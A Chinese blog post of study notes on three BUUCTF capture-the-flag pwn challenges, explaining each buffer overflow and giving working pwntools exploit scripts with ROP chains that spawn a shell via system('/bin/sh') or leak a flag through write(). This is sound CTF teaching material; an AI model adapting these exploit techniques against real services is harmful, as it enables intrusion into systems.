学习笔记:buuctf pwn题

最新推荐文章于 2024-05-04 22:17:26 发布
最新推荐文章于 2024-05-04 22:17:26 发布
阅读量284 收藏
点赞数 1
分类专栏: buuctf 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RookieMOR/article/details/125502832
版权

1.jarvisoj_level2_x64

2.[HarekazeCTF2019]baby_rop

3.not_the_same_3dsctf_2016

1.jarvisoj_level2_x64:

先checksec:

64位,开启了NX保护。用ida64打开:

 进入function函数:

 

看见read函数,存在溢出,f12,发现/bin/sh,更进:

 在ida右侧可以知道system的函数地址,所以可以构造payload,获取shell,代码:

from pwn import*

io = remote('node4.buuoj.cn',26749)

#payload = b'a'*(0x80+8) + p64(0x4006b3) + p64(0x40063e) + p64(0x600a90)
payload = b'a'*(0x80+8) + p64(0x4006b3) + p64(0x600a90) + p64(0x40063e)

io.recvline()
io.sendline(payload)

io.interactive()

 在system和/bin/sh的地址之间还需要插入一个地址。

2.[HarekazeCTF2019]baby_rop

也是64位,ida64打开,找到main:

 scanf函数,存在溢出漏洞,有system函数,f12,发现/bin/sh。

和上一题一样的解法,构造payload,

from pwn import*

io = remote('node4.buuoj.cn',28299)

payload = b'a'*(0x10+8) + p64(0x400683) + p64(0x601048) + p64(0x400490)

io.sendline(payload)

io.interactive()

 获取shell,得到flag。

3.not_the_same_3dsctf_2016:

ida打开:

 gets函数,没有限制输入个数,存在溢出,f12,没有发现/bin/sh,但有一个flag.txt, 在get_secret函数里面。fpoen打开了flag.txt,并存入了v0,fget又把v0赋给了fl4g,并且fl4g在bss字段上面。因为该程序里面存在write函数,因此,可以通过write函数读取bss字段的fl4g,得到flag。

代码:

from pwn import *

#io = process('./not_the_same_2016')
io = remote('node4.buuoj.cn',27884)

get_sercet_addr = 0x80489a0
write_addr = 0x806e270

flag_bss = 0x80eca2d

payload = b'a'*(0x2d) + p32(get_sercet_addr) + p32(write_addr) + b'a'*4 + p32(1) + p32(flag_bss) + p32(45)

io.sendline(payload)

io.interactive()

RookieMOR
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 269
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
jarvis oj level2-x64
CNXBDSa的博客
07-27 378
栈溢出大佬总结详情 好了说说做这的过程 思路和个人见解吧 首先明白32位和64之间的传参的差距 32位通过栈来进行传参 64位是通过寄存器来传参 -----函数参数的传递方式发生了改变,x86(32位)中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。 第一步我们还是checksec查看...
jarvisoj_level2_x64[BUUCTF]
最新发布
moonlightsunshin的博客
05-04 224
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道 64位会依次传函数返回地址,函数参数,函数调用地址,
buuctfpwn(2~10)
yw__y的博客
03-30 923
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1022
buuctf pwn
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
pwncollege:部署pwn.college
02-24
大学该存储库具有部署pwn.college实例所需的工件。设置docker build -t pwncollege_challenge containers/pwncollege_challengecp -r CTFd-pwn-college-plugin CTFd/CTFd/pluginsdocker-compose up -ddocker run --...
BUU PWN(一)
playmaker的博客
01-28 2078
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
pwnnum20----栈溢出
tbsqigongzi的博客
04-25 152
BUUCTF-PWN-warmup_csaw_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 未开启NX保护-----堆栈可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 程序运行后告诉我们一个地址0x40060d ida一下看一下伪代码 主函数里有一个sprintf注意一下 sprintf(&s, "%
BUUCTF目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 977
BUUCTF目Rverse & Pwn部分的writeup(持续更新)
BUUCTF之路-pwn1_sctf_20161
qq_30528603的博客
05-27 404
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
CTF-PWN笔记(二)-- 格式化字符串漏洞
CK_0ff的博客
01-27 1217
文章目录漏洞介绍格式化字符串的格式漏洞原理及利用例 漏洞介绍 格式化字符串(英语:format string)是一些程序设计语言的输入/输出库中能将字符串参数转换为另一种形式输出的函数。例如C、C++等程序设计语言的printf类函数,其中的转换说明(conversion specification)用于把随后对应的0个或多个函数参数转换为相应的格式输出;格式化字符串中转换说明以外的其它字符原样输出。 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。 通俗来
ctf pwn 个人经验记录
jmp esp
05-22 8852
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
BUUCTF PWN记录 (未完待续)
qq_41071646的博客
08-01 1971
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一 连上就有flag的pwn 直接 运行就有权限,。 第二 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2546
目录 程序基本信息 程序溢出点 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出点 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值